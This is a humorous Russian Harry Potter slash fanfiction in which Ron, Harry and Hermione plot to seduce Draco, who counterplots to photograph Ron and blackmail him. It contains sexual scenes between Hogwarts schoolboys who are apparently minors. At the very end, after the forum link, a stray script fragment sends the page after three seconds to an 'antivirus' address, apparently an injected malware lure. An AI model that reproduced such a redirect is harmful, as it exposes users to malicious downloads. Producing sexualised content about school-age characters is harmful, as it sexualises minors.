Засада

Автор: Стая
Бета: Мать
Рейтинг: R
Пейринг: РУ/ДМ/ГП
Жанр: Слэш, Юмор.
Саммари: Рон влюбился в Драко, или к чему приводит весенняя хотючка. Раскрываю сенсационные тайны. Был составлен идеальный план. Но разве гриффиндорцы способны реализовать его идеально?
Дисклеймер: к чему такой звезде, как я, чужая слава. Скромности бы… Некоторые фразочки потырены у А.Милна из «Винни-Пух и все-все-все» (про коготки и винтики), мультика «Волшебное кольцо» (насчет одичания), а также реклама, пардон, БИОПРОСТа. Стих, сочиненный Роном для Малфоя, тоже не мой, и автор мне неизвестен. Им всем от меня большое спасибо, от них же мне ничего не нать.
Предупреждение: в процессе написания не пострадало ни одного Малфоя. Я имею ввиду, серьезно не пострадало.

Весна. Майское солнышко одинаково ласково припекало макушки достойных сынов и дочерей Гриффиндора и Слизерина. И вовсе не потому, что в классе потолок от древности обвалился, а потому, что урок проходил на свежем воздухе. Профессор Спраут показывала детишечкам, как ухаживать за милыми ярко-оранжевыми цветочками, напоминающими ноготки, под названием «Слепая ярость». Мальчик по имени Гарри Поттер с удивлением отметил, что его доселе прилежная и усидчивая подруга Гермиона сегодня совсем не слушает учителя. Более того – она протиснулась сквозь толпу прямиком к нему, ухватила за рукав и оттащила на пару шагов.

- Ты чего, Гермиона?

- Всё, - прошипела она. Личико девушки покраснело. «Нанюхалась «Слепой ярости», - с ужасом подумал Гарри. - «Сейчас как начнет меня мутузить!»

- Не могу больше, - продолжала она. – Твой друг меня совсем извел. Может, ты для общего развития поинтересуешься его делами?

- Чего? – не понял Гарри.

- Ничего! Ты что, ослеп на оба уха? – она схватила его за подбородок и развернула к классу. – Посмотри на это!

- На что?

- Рррр, - зарычала Гермиона. – Рон, твой друг, помнишь такого?

- А что с ним? По-моему, всё прекрасно!

- Разуй глаза, очнись, глянь, куда он смотрит?

Гарри разул. И поставил кеды в сторонку, чтобы уж теперь-то наверняка узреть то, что так взволновало Гермиону.

- Ну? – нетерпеливо дергалась подруга.

- Ну… - задумчиво потянул Гарри. – Он смотрит…

- На Малфоя он смотрит! – не выдержала девушка.

- И что?

- А то, что он на него уже вторую неделю так смотрит!

- А что Малфой? – Гарри был окончательно сбит с толку. Какая корысть на Малфоя смотреть?

- А то, - Гермиона грозно завращала глазами. Гарри икнул. – Привожу статистику: Малфой показал ему язык – два раза, демонстративно отвернулся – десять раз, послал… не буду говорить куда, еще пойдешь – заблудишься… - восемнадцать раз! И это, заметь, только за этот урок травологии! А этот гаврик за вышеозначенные две недели домогается до меня с дурацкими просьбами. Я в ваших мальчишечьих соплях ничего не смыслю – мне хватит и Лаванды, что по Рону убивается. Так что вручаю его любовные терзания тебе! – и она демонстративно задрала нос, зашагав на своё место.

Гарри ничего не понял, но, встретившись глазами с безумным взглядом Рона, решил всё выяснить нынче же вечером. Пока он усиленно думал, с чего бы начать расспросы, Рон сам подошел к нему. Ох, зрелище было, что ни на есть самое печальное. Глаза – как у побитой больной собаки, нервная блуждающая улыбочка в сочетании с веснушками на то бледнеющем, то краснеющем лице.

- Аж плакать хочется, - вместо приветствия произнес Гарри.

- Кхе-кхе, - громко прокашлялась проходящая мимо стопка книг с ногами Гермионы. – Вот именно.

Рон согласно кивнул, тяжело вздохнул и уселся в кресло.

- Валяй, бухти мне, как в наш магический век последователи Вольдеморта бороздят просторы имения Малфоев, - развязно начал Гарри, развалившись в кресле напротив. При фамилии «Малфой» роново лицо опять сменило цвет.

- Ох, Гарри… Гермиона тебе рассказала?

- Господи, Рон, об этом весь факультет судачит!

Рон едва не упал в обморок, и Гарри скоренько заверил его, что пошутил.

- Ну, вообще-то, сложно не заметить, - соврал он.

- Гарри, ты мой самый лучший друг! Я в такой засаде! – быстро заговорил Рон. – Понимаешь, я ненавижу Малфоя. Он отвратительный, скользкий, язвительный, циничный, неприступный… и такой красавец, черт возьми! Как, скажи на милость, теперь поддерживать своё реноме, если я втрескался в него по уши? Как теперь бить ему морду? Как засовывать в штаны заколдованных кровожадных пиявок?

- Это было жестоко, - отметил Гарри. – Малфой потом мылся только в ванне для старост в гордом одиночестве. И не загорал ниже спины.

- А со слизняками тогда что? Высшее проявление гуманизма? Меня ими рвало полдня! А за пиявки я даже извиниться хотел. Кому, право, нужна такая жестокость… Но он швырнул в меня мисс Норрис и сказал, что на такую мерзость способны лишь нищие никчемные колдунишки-дилетанты! А мне вдобавок от Филча досталось… Ни за что!

- За пиявки. И кошку.

- Не суть!

- Ну, раз ты теперь не можешь бить ему морду… - Гарри наморщил нос, вспоминая. – Подари ему цветов.

- Чего? – синие глаза Рона расширились.

- Не «чего», а «какие». Коготки. И винтики.

- У тебя не хватает винтиков, Гарри, - Рон демонстративно повертел пальцем у виска, огляделся и понизил голос. – Как жить дальше… Представь: я возле слизеринской гостиной топчусь в ожидании Малфоя. С веником. Умереть – не встать.

- М-да… - потянул Гарри. – Здесь нужен план. Коварный и беспроигрышный план!

- По коварству – это у нас Симус специалист, - просиял рыжий.

- Болтун он, твой Симус, - возразил Гарри. – Дин слишком мечтательный, Невилл вообще дите неразумное… И вообще они по женской части.

- А ты? Ты сам по какой части? – если прислушаться, в голосе можно было уловить нотки надежды.

- По филейной, - отшутился Гарри. – Грудинка, там, лопатка… Мозжечок… Шучу. Я еще не определился.

Рон печально вздохнул.

- Но хоть поможешь мне?

- Ронни, - хриплым грубоватым голосом ковбоя с дикого запада произнес Гарри и положи ему руку на плечо. – Или я тебе не друг?

Оба рассмеялись и, обнявшись, отправились в спальню – спать, между прочим, а не за тем, что вы там себе подумали, испорченные девчонки и мальчишки!

Бедный Малфой! Он и не подозревал о неслыханной доселе афере гриффиндорского трио. То есть дуэта – потому что Гермиона наотрез отказалась помогать Рону в завоевании Малфоя. Время для сердечных дел, разумеется, было крайне неудачным – близилось время Х, то есть экзамены. Задачка была непростая: влюбить Малфоя в Рона, успешно сдать всю эту магическую ересь и с чувством выполненного долга отправиться на каникулы. Грядущая разлука с объектом воздыхания начисто выбивала Рона из колеи, отчего он становился еще более рассеянным и неряшливым.

Запасшись для конспирации свитками, конспектами и парой бутербродов, мальчишки отправились на берег озера. Оба влезли на дерево и уселись поудобнее.

- Итак, начнем. Рон, мне кажется, что ты не влюблен. Ну, посуди сам, как можно полюбить Малфоя?

Рон открыл рот – видимо, он знал множество способов, но Гарри жестом остановил его и продолжил.

- Это означает, что ты не влюблен, а просто хочешь его. После того, как ты с ним… ну, сам понимаешь, до тебя дойдет, что ты жестоко ошибся в чувствах. Сделаешь ему ручкой и женишься на Лаванде. Это сильно упрощает задачу. Достаточно затащить Малфоя в постель и показать ему… Ну, в общем, ты понял, что показывают в таких случаях. Для того, чтобы достичь цели, нужно поместить вас… в… экспериментальную среду… Тьфу, убью Гермиону, - чертыхнулся он, копаясь в бумажках. – Короче. Создадим вам экстремальную ситуацию, в которой он сам к тебе потянется. Можно, скажем, так: я заманю его в Запретный лес и начну вытряхивать из него душу. Или что там у него есть в штанах. А ты появишься, словно Спайдермен, и восстановишь липовую справедливость. То есть… - Гарри снова посмотрел на пергамент, - …фиктивно спасешь ему жизнь. Понарошку, если ты не понял. Потому и бить меня надо аккуратно.

- Я знаю заклинание, рисующее фальшивые синяки! – с восторгом сообщил Рон. – А можно, я не буду Спайдерменом – у меня арахнофобия, забыл? Лучше Бетменом!

- Годится, - покровительственно сообщил Гарри. – Ты спасаешь Малфоя, он весь в слезах – да, уж я устрою ему, давно мечтал! - и благодарностях, будет предлагать тебе награду за спасение его слизеринской чести. Вот её-то ты и возьмешь. Потому что даже такие богатеи, как Малфой, в Запретный лес с карманами, полными денег, не ходят! Так что кроме чести ему отдавать будет нечего!

Рон согласно закивал головой, с замиранием сердца выслушивая друга.

- Можно разнообразить процесс: я напугаю его до полусмерти и скажу тебе, где он лежит. Ты пойдешь, подберешь тельце и будешь выхаживать в тайном месте. Бункер какой-нибудь глухой прекрасно подойдет. Когда очухается (а можно и не дожидаться, чего уж там, извини, конечно!), несмотря на все ваши разногласия, будет тебе по едва не достигнутый гроб жизни благодарен. И, опять же, ты этим воспользуешься. А можно совместное наказание у Снейпа заработать… Но это чревато… в общем, Снейпом и чревато, что уж тут говорить!

- Дурацкий план, - неожиданно раздался голос из-под дерева. – Мир населен дилетантами! – белокурая макушка качнулась из стороны в сторону, острый язычок зацокал неодобрительно и разочарованно. – Учиться, учиться, и еще раз учиться! Сгодятся свечи, виноград, дурманящий аромат сандала в воздухе, черные шелковые простыни, интимная обстановка… а не ваша доморощенная бандитская романтика!

Гарри свесился с ветки вниз головой на манер летучей мыши.

- А если будет вся эта хрень, что ты перечислил, - хитро улыбнулся он и пошел в наступление. – Пойдешь на свидание?

Драко Малфой поднял голову и прищурился.

- А пойду. Только пусть Уизли захватит тебя с собой, а то один он не справится.

Чмокнув Гарри в нос, Малфой поднялся и направился в замок.

- Будет тебе интим, зараза такая, - Гарри спешно потер кончик носа. – Особенно свечи. И не в ухо, и не в глаз, догадайтесь-ка с трех раз! – Он рывком подтянулся и посмотрел на Рона. Тот сидел бледный, как Вольдеморт, изо всех сил держась за ствол дерева.

- Он нас слышал… - пролепетал он.

- Плевать, - беспечно махнул рукой Гарри. – Он согласился на свидание с тобой!

- С нами, - решительно поправил его Рон.

- Что я, одичал, что ли? Свечи – еще куда ни шло… Всё остальное будешь делать сам! А будет сопротивляться – перекроем кислород… Я хочу сказать – ты же сильнее физически. Мы устроим этот самый интим, пока суть да дело, я украду у него волшебную палочку и смоюсь, и тогда… - тут он снова камнем упал с ветки, дабы убедиться, что никакая сволочь их не подслушивает. Колени о резкого движения разогнулись, а Гарри пребольно навернулся на грешную землю. Рон сполз следом на манер Винни-Пуха.

- Пойдем, найдем Гермиону, - простонал Гарри, потирая ушибленный локоть. – Насчет экстерьера надо бы проконсультироваться…

- Чего?

- Говорю, внешний вид чтобы достойный у тебя был.

- Аааа…

Гермиона, увидев возле дверей спальни для девочек две помятые, но решительные рожицы, хотела поубивать их на фиг, но потом решила, что кроме них с ней никто дружить больше не соглашался (иноземец Крум был не в счет), и сказала, что зайдет к ним через полчаса.

- Не годится, - критиковала Гермиона.

- Но из парадно-выходного у меня только этот старый смокинг Билла! – Рон в отчаянии заламывал руки. Гарри сидел на подоконнике и пробовал курить сигареты Финнигана. Получалось… в общем, не получалось совсем; парень сидел в дыму, кашлял и ругался.

В качестве территории для проведения боевых действий был выбран старый заброшенный класс. Черные шелковые простыни приволокла Гермиона. Она по старинной, выработанной на первом курсе привычке тырила всё, чего ей не хватало в жизни, у профессора Снейпа. Гарри и Рон даже не задумались, как девчонка узнала, что они у него есть и уж тем более при каких обстоятельствах она завладела этими постельно-бельевыми изысками.

- И куда мы это постелем? – Рон нервно потрясал простынями. – Не на парты же!

- Ну, и не на пол, - резонно добавил Гарри. – Этот Малфой такой затейник, право слово! Простыни… К чему такие церемонии…

Оба выжидательно смотрели на Гермиону. Девушка фыркнула.

- Подушки по всем факультетам воруйте сами. Я уже и так с этими простынями намучилась. Снейп от раза к разу так над Запирающими заклинаниями изощряется, сил нет!

- А ты всё воруешь, - укоризненно сказал Гарри.

- Ради вас, дурачьё! Напомнить? Шкура бумсланга для Оборотного зелья – мне, что ли, нужна была? Ага, как Вольдеморту валидол!

- Ладно, не кипятись, - смиренно попросил Рон. Он уже переоделся в ужасно узкие джинсы и бледно-голубую рубашку из жатой ткани. – Посмотри, как я выгляжу.

- Ништяяяк, - потянул Гарри. Он как раз доел пирожок с яйцом и потянулся масляными пальцами к рубашке. – Почем матерьяльчик?

Рон хлопнул его по руке.

- Бешеных денег стоит. Пришлось кнаты в галеоны переколдовывать. Да еще в бешеные. Один даже продавца за палец тяпнул!

- Хагридова школа! – гордо сказала Гермиона и сделала шаг назад, дабы осмотреть друга получше.

Гарри укоризненно покачал головой.

- С кем я повелся! Ворюга и фальшивомонетчик! – и дико заржал.

- Зато синяков тебе понаставлю настоящих! – пообещал Рон. – Кстати, Гарри, ты тоже должен… приодеться.

- Зачем? – он ловко спрыгнул с подоконника, развел руки и медленно, покачиваясь, повернулся вокруг своей оси.

- Не льсти себе, - скривился Рон. – Я сейчас по сравнению с тобой принц.

- Так и надо, - поддержала Гермиона Гарри. – Иначе Малфой, не дай Мерлин, западет на Гарри.

Рон почесал в затылке.

- Может, ему личико чем-нибудь прикрыть, а? – обратился он к Гермионе. Девушка закатила глаза.

- Не дури, Рон. Малфой меня ненавидит еще больше, чем тебя. Я, кстати, вообще не понимаю, с чего это вдруг он так легко согласился…

- Поэтому будьте начеку, ребята. Удачи, - и Гермиона ушла.

Гарри еще раз придирчиво оглядел друга. Рон по такому случаю даже причесался и стал весьма симпатичным. Если бы не этот вечно приоткрытый как бы в удивлении рот… Ммм…

- Губы, - решительно произнес Гарри.

- Что?

- Надо, чтобы они влажно блестели, - с видом знатока произнес Гарри. – У Невилла где-то есть бальзам, у него зимой вечно губы трескаются, я сам видел, как он им мажется. Тайно.

С этими словами Гарри полез в тумбочку Невилла, и через минуту вылез оттуда с торжествующим «Та-да!»

Рон, морщась, осторожно нанес бальзам. Губы и вправду блестели. Влажно. Гарри невольно облизнулся.

- Надо бы проверить, - голос немного сел. – Ведь прежде чем затащить Малфоя в кровать, тебе придется его поцеловать. Да так, чтобы ему понравилось. Иначе весь гениальный план Живоглоту под хвост.

Рон с готовностью кивнул, и обрадованный Гарри сделал шаг навстречу, приготовившись немедленно определиться с ориентацией и даже зажмурился.

- На, - Рон пихнул ему в руку бальзам. – Намажься и оближи. Если невкусно тебе покажется – мне скажешь.

Гарри едва удалось скрыть разочарованный вздох.

Малфой не был бы собою, если б не предпринял контрмеры. На военный совет были вызваны ближайшие соратники по партии: Крэбб и Гойл. Они засели в Слизеринской гостиной и внимательно слушали своего лидера.

- Итак, господа, спешу вас обрадовать. В меня втюрился рыжий оболтус по фамилии Уизли, - терпеливо втолковывал Драко. – У бедняги крышу снесло, хоть святых выноси, и он подрядил Поттера пригласить меня на свидание.

Гойл хрюкнул и ткнул Крэбба локтем в бок.

- Я согласился.

Если бы эти «оба двое» не были бы безгранично тупыми, то упали бы в обморок. А так они просто хлопали глазами и пооткрывали рты.

- Это как? – промямлил Крэбб.

- Сказал бы я тебе «как», да народу больно много, - прошипел Драко и продолжил: - Чего мне это стоило, господи… Ладно, к делу. Господа, я своим согласьем любовь не опошлил, я лишь пожертвовал своей репутацией для величайшей развлекаловки. Итак, порядок такой. Первым делом ты, Гойл, украдешь у Криви волшебную фотокамеру. Весь процесс нужно будет снимать, а уж как поступить со снимками – мы потом решим. Вторым делом запоминайте знаки. На каждый такой знак вы должны будете совершить заранее оговоренное действие. Я понятно выражаюсь?

Оба кивнули. Нерешительно. Чем и привели своего босса в бешенство, но Драко держался молодцом. Папочкина школа.

- Хорошо, - выговорил он, вытирая пот со лба. – Давайте определяться…

Пока слизеринцы определялись, Гермиона не теряла времени даром. За считанные минуты до начала свидания она ворвалась в гостиную с баночкой в руке.
- Вот! – она торжествующе потрясла баночкой. – Достала!
- Это еще зачем? – с некоторым подозрением спросил Гарри.

- Ну, я прочла много книг… Это Рону понадобится, когда Малфой сдастся под натиском его… неземного очарования, – она хихикнула. – Любрикант называется. - У Снейпа сперла, - неодобрительно проворчал Гарри. – Небось, для себя варил, а ты изъяла.

- Что-то пахнет оно мерзковато, - Рон отшатнулся от банки.

- Спокойно, братцы. Ну, у Снейпа, и что с того? У него таких склянок в лаборатории пруд пруди. Еще сварит…. чего? – спохватилась она. – Для себя? – и густо покраснела.

- Не возьму я эту дрянь, - Рон пошел в отказ.

- Бери, не прогадаешь.

- А чего с ней делать-то?

Гермиона популярно объяснила.

- Ух, ты, - восхитился Гарри, а Рон стал пунцовым и спрятал баночку поглубже в карман мантии.

Гермиона проводила мальчишек с баночкой и простынями до старого класса, напутственно чмокнула в щечку и резво поскакала в сторону слизеринских подземелий.

Рон заметно нервничал и постоянно перекладывал заветную баночку в разные места.

- Не психуй, - пытался вразумить его Гарри. – Это же всего-навсего Малфой, а не Бред Питт какой-нибудь.

- Ты не понимаешь! – волновался тот. – Он… восхитительный… Рядом с ним я чувствую себя богом!

- А я рядом с вами обоими чувствую себя идиотом, - в сторону сказал Гарри и принялся разворачивать шелковые простыни профессора Снейпа. Они были скользкими и норовили лечь неровно. Гарри ругался, покрылся испариной, но сделал свое черное дело. Рон, как водится, стоял в сторонке и охал.

- Так, сейчас Малфой придет, - Гарри бросил взгляд на часы. – Давай, раскладывай виноград. Я тут еще бутылочку огневиски припас…

- Паленое?

- Да нет же. Для такого случая у Финигана под кроватью прошелся…

- И этот человек называл Гермиону ворюгой! – Рон закатил глаза.

- Вам с Малфоем пользительно будет, - проигнорировал его воздыхания Гарри. – Расслабитесь… А я пошел спрячусь в засаде. Спросит – скажешь, что я ушел за презервативами. Или что-нибудь в этом духе, – Гарри взмахнул ладонью и скрылся в близлежащем старинном гардеробе.

Как по волшебству, в дверях появился Драко – великолепный, неприступный рыцарь в сверкающих доспехах. «А Гарри хотел его…. в Запретном лесу… Как можно!» - успел подумать Рон, прежде чем Драко подошел вплотную и полушепотом выдохнул:

- Наливай…

Они уселись друг напротив друга. Малфой смотрел чуть исподлобья, но прямо в глаза. Рон, в свою очередь, глаза отводил; рука, разливающая спиртное, не дрожала лишь благодаря годам тренировок.

- А где ананасы? – невинно поинтересовался Малфой. Гарри в шкафу фыркнул, но успел зажать себе рот ладонью.

- Сударь гурман? – попробовал пошутить Рон и поднял одну бровь.

- Сударь на диете.

- Вот дерьмо… То есть, я хотел сказать, ну нет у меня ананасов. Сударь виноград изволил заказать третьего дня.

- Ладно, - снисходительно прищурился Драко, разглядывая янтарную жидкость в бокале. Рон немного успокоился. – Окосеешь, - заметил Драко. Рыжий вздрогнул, отвлекся от созерцания спасительного шкафа и посмотрел на слизеринца.

В молчаливом напивательстве прошел час… Локти на столе, почти пустая бутылка «Огневиски», общипанный остов виноградной веточки…

- Мал… Драко, - поправил себя Рон.

- Ннну? – блондин с трудом поднял голову, лежащую на руках на столе. Глазки мутные, губа слегка прикушена… Развратное очарование.

- Я тут, это… - в кармане Рон нервно вертел заветную баночку. Он совершенно не знал, как это сделать, как сообщить ненаглядному блондинчику, что он написал для него ни больше, ни меньше, а стихотворение! Уизли, между прочим, кому попало вирши не ваяют! Что означало только одно – чувства Рона были высоки. А кое-что так вообще забиралось всё выше и выше. Ежишь-мария, и какого хрена я напялил эти узкие джинсы?

Драко тем временем бросил взгляд на дверь и подался вперед.

- Стихи написал, – сердце рыжего как-то страдальчески булькнуло.

Драко, казалось, это ничуть не удивило. Гарри, наблюдавший в дверную щелочку из шкафа за происходящим, в мыслях обматерил Драко за бесчувственность и повздыхал аккуратненько, что Рон ему, Гарри Поттеру, никогда не писал стихов!

- Почитай мне, - попросил Драко и склонил голову набок.

Рон попытался подняться. Но то ли от волнения, то ли от огневиски он охнул и сел на место. Слизеринец вышел из-за стола, подошел и протянул руку.

- Негоже декламировать сидя.

«Мама дорогая», - Рон неуклюже ухватился за руку, и вот они уже стоят друг напротив друга.

- Я поддержу.

От голоса Малфоя Рон терял множество способностей, коими человека от рождения наделяет природа: ходить, говорить и думать. С превеликим трудом он принялся читать по памяти.

- Я желаю тебе неудачи,
Чтоб на помощь меня ты позвал:
Поломай себе руки и ноги,
Потеряй в суете кошелек,
Окажись у медведя в берлоге,
Опрокинь на себя кипяток,
Выпей чашку чернил по запарке,
убашку новую супом залей,
Наступи на змею в зоопарке,
В день рожденья чумой заболей,
Упади на ходу с электрички,
Пострадай от блатного ножа,
Загорись от погашенной спички,
Сядь в лесу на большого ежа,
Забреди на прогулке в болото,
Проколи себе палец иглой,
Упади на забор с вертолета,
Подавись баклажанной икрой…
И когда приключится такое,
Я на помощь тебе поспешу –
Я тебя излечу, успокою,
Заслоню, защищу, затушу…*(с)

За дверью послышался топот, и Драко испугался, что вот-вот его гениальный план рухнет из-за этих двух неуклюжих слонопотамоподобных Крэбба и Гойла. А требовалось всего ничего: затащить рыжего в кровать, раздеть (или пусть сам разденется, что я, нянька, в самом-то деле?!) и смыться, а вместо себя подсунуть ему Крэбба и Гойла. Заснять всё это на пленку и шантажировать. Цена – Поттер. На неделю, не меньше. Иначе – позор на всю школу, которая этого не забудет лет двести.

- В жизни не слышал ничего прекраснее, - выдохнул Драко, поглаживая веснушчатую щеку большим пальцем, одновременно касаясь пальцами мочки уха. – Ронни, крошка, а где Поттер?

Рон стоял с закрытыми глазами. В это время дверь отворилась, и в комнату на цыпочках проскакали Крэбб и Гойл в чем мама родила. И шасть - прямиком за шкаф, где прятался наш герой. И вмиг стало ясно – надо предупредить Рона, что Малфой пришел не один, что Малфой с кузнецом пришел! С двумя, если быть точным. Это ж… молотом, прости господи, по наковальне! Бедный мой, дорогой Рон! И отважный Гарри Поттер, возжелав оправдать звание героя, решился покинуть свой шкаф…

От неожиданного вопроса Рон открыл глаза. Но голые слизеринцы уже сховались, и он их не увидел. Зато он увидел Гарри.

- П-п-поттер? – переспросил Рон. И тут он увидел его.

Гарри полз, уподобившись земляному червю, порешив, что при максимальном соприкосновении тела ползущего с площадью поползновения, шуму издаешь меньше (надо сказать, физику им в Хоге не преподавали (прим. автора), и тактику ведения боя тоже. Иначе бы для отвлекающих маневров в противоположный угол комнаты была бы брошена граната.)

Ползучий Поттер при этом строил страшные пантомимы на лице, но зачем – Рон так взять в толк и не смог – срок был слишком короткий.

«Только бы Малфой не обернулся!» - мелькнуло в голове у рыжего. И откуда только храбрость взялась – мальчишка принялся целовать Малфой. Тот едва не лишился чувств от такого напора, но успел отметить, что целовался Рон нежно, хоть и чересчур порывисто. Обуздав свои гормоны, паровозиком побежавшие «в гору», Драко решил, что пора перейти к самому интересному. Прервав поцелуй, он провел пальцами по губам Рона и предложил:

- Посмотрим, что там у нас, - кивнул он в сторону импровизированного ложа – подушки, накрытые черной шелковой простыней самого профессора Снейпа.

- Блин, что деется, - пробасил голый Гойл за шкафом.

- Наш шеф совсем сдурел, целоваться с Уизли, - вторил ему столь же голый Крэбб.

- А это что за тварь дрожащая? – Гойл ткнул толстым пальцем в сторону ползущего Гарри.

- Не было такого уговору, - подтвердил Крэбб, - чтобы всякие выползни портили нам малину. Предупредим шефа.

- Как? Мы же голые!

- Да тут, похоже, сейчас все будут голые. Так что мы несильно выделимся. Только червячка прижучим…

И толстяки покинули зашкафье, взяв гаррин след.

Гарри Поттер тем временем переводил дух за уроненным столом. Отсюда хорошо «простреливался» весь класс, а особенно хорошо – некое подобие кровати, что им удалось соорудить. Гарри бил себя по голове, словно Добби, укоряя себя за то, что сам толкнул лучшего друга в объятья коварного Малфоя. Надо украсть палочку, пока не поздно!

Драко тем временем уже мурлыкал под ласковыми пальцами Рона, улегшись на живот. Тот нежно поглаживал его вдоль позвоночника, слегка царапая в нужных местах, отчего слизеринская котяра прогибалась и с тихим присвистом втягивала воздух сквозь зубы, при этом ухитряясь молить Мерлина не потерять рассудок  в нужный момент. (Просто Гай Юлий Цезарь какой-то (прим. автора). Если б ему дали машинку, он бы и крестиком начал вышивать, не иначе). Ласки рыжего тем временем достигли критической массы, и он потянулся за заветной баночкой.

- Рон, друг сердечный, что же ты со мной делаешь, - сокрушался Гарри, кусая губы. Взгляд его случайно упал на пол. Там стояла гладкая черная коробочка с монограммой «К.К.». Замочек щелкнул, и Гарри ахнул от изумления. Слева раздался шорох, и взору парня предстали крадущиеся голые слизеринцы.

- Так вот оно что! Ничего у вас не выйдет, хоть вы и голые! – зло прошипел Гарри.

- Расслабься, любимый, - шептал Рон в самое очаровательное ушко на свете. «Черт, надо было поинтересоваться, что сперва мазать… Наверное, надо начать с партнера, ему приятно будет…» - с этими обрывками когда-то мыслей он погрузил пальцы в содержимое баночки и аккуратно провел ими между ягодиц в самый…

- А- а- а- а- а!!! – Драко в жизни своей так не орал. И не бегал так быстро. Он вскочил, сбросил с себя Рона и принялся носиться кругами по комнате, размахивая руками и хватаясь периодически за задницу. За ним бежал Рон, абсолютно не понимая, как такой спортивный забег мог стать частью любовной игры; при этом он выкрикивал Драко, что никогда бы не сделал ему больно. За Роном припустил Гарри (одетый, в отличие от всех участников марафона) и пытался на бегу втолковать другу, что всё это свидание – большая подстава, и надо не за Малфоем бежать, а к выходу. Завершали марафонский забег голые Крэбб и Гойл. А из-за колонны притаившаяся там Гермиона без конца щелкала фотокамерой, обещая всем и каждому, что школа этого не забудет лет триста.

- И смех, и грех, - Гермиона промокала ушибы и синяки на своих друзьях отваром подорожника. – Как вы могли! Опуститься до такого!

- А чего ты ожидала, - хмыкнул Гарри и осторожно потрогал пальцами вздувшуюся скулу. – Это же свидание!

- Я не про ваш спринт, я про драку. Рон, не дергайся, будет хуже!

- Хуже уже не будет, - мрачно сказал Рон. – Малфой теперь ко мне и близко не подойдет.

- Ты всё еще любишь его? – возмутился Гарри. – После всего, что он с тобой сделал?

- А, - отмахнулся рыжий. – Мне вот только интересно, отчего ж он так возопил и вскочил, как ошпаренный? А всё было так прекрасно… Эх…

- Гермиона, - Гарри медленно повернулся к девушке. Его терзали смутные сомнения. – Что было в той баночке?

Она молча протянула Гарри склянку и отскочила на безопасное расстояние. Рон склонил голову, и они оба хором прочитали наклейку:

- «Скипидар»…

Переглянулись.

- Женщин не бьем, - хрипло сказал Гарри.

- Но пытать их никто не запрещал, - припечатал рыжий.

Гермиона ойкнула и выбежала из комнаты, мысленно пообещав, что если кто-нибудь, когда-нибудь, хоть пальцем, то репортажем марафона будут пестреть страницы всех колдовских журналов.

Мальчишки переглянулись.

- А мы-то думали…Оказывается, у Снейпа не роман с Гермионой, а ревматизм…

- Интересно, а что там у нас поделывает Малфой? – мечтательно потянул Рон.

В ту же секунду в комнату влетел крошечный бумажный голубь и опустился на ладонь Гарри. Он развернул его; это оказалось письмо.

«Поттер, только ты и я. Ночь, звезды, прохладный ветерок и шелест листвы Запретного леса…»

Гарри вздохнул. Ну, как же можно идти на свидание с этим чудовищем?

«…И прихвати с собой Уизли. Я уже одолжил у Грэйнджер сам-знаешь-что.»

Вот так-то оно, конечно, лучше.

- Что там? – обеспокоено поинтересовался Рон.

- Друг мой, - Гарри обнял его за шею и поцеловал. – Нас приглашают на свидание. В Запретный лес.

Рон смутился немного, покраснел и перечитал записку.

- Согласен, - выпалил он и прибавил: – Простор для забега в лесу куда шире!

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>